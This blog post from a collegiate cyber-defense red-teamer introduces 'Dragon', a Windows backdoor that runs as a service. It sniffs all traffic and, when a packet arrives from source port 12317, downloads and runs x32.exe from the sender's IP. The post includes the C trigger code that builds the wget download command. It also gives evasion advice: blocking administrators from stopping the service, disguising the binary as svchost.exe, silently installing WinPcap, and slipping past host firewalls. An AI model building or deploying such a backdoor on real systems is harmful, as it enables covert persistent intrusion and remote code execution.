Thursday, January 16, 2014

Dragon a windows, non-binding, passive download/exec backdoor.

In the many years of participating in CCDC I keep running into the same problem.  If you've red teamed for one of these events, I'm sure you've encountered the same.  You've gotten a shell on a system, you've even installed a backdoor either through a bind listener, or through a reverse connection that calls back periodically. However, the savvy blue teams, either through firewall new rules killed your connection, or via netstat identified your back door and killed the process.

I've grown so frustrated with loosing my shells I decided to write (okay mostly steal and modify) a new backdoor specifically for windows.  I noticed that since the teams are scored for having their services up and running, they will never (in their right mind) firewall off access to the service running on their windows servers.   However, since the victims system would be running their service on that non-firewalled port, I couldn't just bind my listener to that same service.

So, instead of binding a socket to that interface/port, what if we set the interface to promiscuous mode, and listened to all the traffic on the machine.  We could then monitor for a specific trigger on all of the passing traffic and if one of those packets happen to match our rule set, we could run our back door code.

For this I wrote an app called dragon. Dragon, is a windows app that is designed to be installed as a windows service and will run at windows boot. It will listen to the first interface available to the OS (note, if you have multiple interfaces, this will only pick the first one to listen too).  It will continuously listen to all traffic across this interface, and discard ALL packets its uninterested in.

If a packet comes in with the Source Port of 12317, it will execute the following:
if (sport == 12317) { //Change this if you want it to listen on a different port.      
      remove( "c:\\windows\\system32\\x32.exe" );
      char cmd[255];        
      sprintf(cmd, "\"c:\\windows\\system\\wget.exe http://%d.%d.%d.%d/x32.exe\"", ih->saddr.byte1, ih->saddr.byte2, ih->saddr.byte3, ih->saddr.byte4 );

First it will remove any file stored under c:\windows\system32\ called x32.exe.  Next using wget.exe (you'll need to install this on your own).  It will download x32.exe from a host where the magic happy packet was sent from.  This means that even if the blue team firewalls off your attacking server, just change your IP, and send your happy magic packet from your new IP. It'll still work.  Lastly it'll execute it.  Note that we are using system() to call our binary.  Doing this means that the service will wait until the execution of x32.exe has finished before listening again for more happy packets.  I didn't want to fill taskmgr with a string of x32.exe's.  Lastly, I chose the name of the exe and source port as a preference, if you like to use something else just modify it in this function, the rest of the code can remain untouched. Heck you could put what ever you wanted here, shellcode to be executed, windows commands like add users to local adminstrators, etc. Its pretty modular, I just wanted the ability to down/exec when needed.

Other things to note.  This windows service employs the following code:
   ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_SHUTDOWN;
The ServiceStatus.dwControlsAccepted is the value which tells the service, what states it'll accept from the user.  Right now its set to only accept termination when being told that the system is shutting down.  This means the user can not pause or start the service, even if they are Administrator  The only way to kill/stop it is using task manager and kill the procces.  To help blend in even further I recommend you rename dragon.exe to svchost.exe :).

Other Items:

  1. This runs at a layer that is lower than the host firewall.  I haven't noticed many teams using host based firewalls, but even if they did, it wouldn't block this.
  2. This exe does require that libpcap driver be installed on the victims machine.  A reboot is NOT needed for this, but a silent install of winpcap is recommended.  I tried doing manual installs and it became a pain with 64 bit systems.  Instead the wonderful people over at released a winpcap installer that has a silent switch:  winpcap.exe /S.  Pretty simple.
  3. This code will compile (use  MinGW) for both 32bit and 64bit executibles.  I have successfully run this backdoor on:
    1. Windows XP 32 bit
    2. Windows 7 32 bit
    3. Windows 7 64 bit
    4. Windows 8 64 bit
    5. Windows 2000 server 32 bit (for fun)
    6. Windows 2003 server 32 bit
    7. Windows 2012 Server 64 bit
  4. It does not work for IPv6 networks because...ew.

That should be about it.  If you're interested, take a look, the code is up on github. Major props to by (for cd00r.c) and (for helldoor.c).  Lastly if you have any questions or comments, leave them below or you can reach me on @jarsnah12 on twitter.

Oh and if you're looking for something similar but for *nix, take a look at knockd.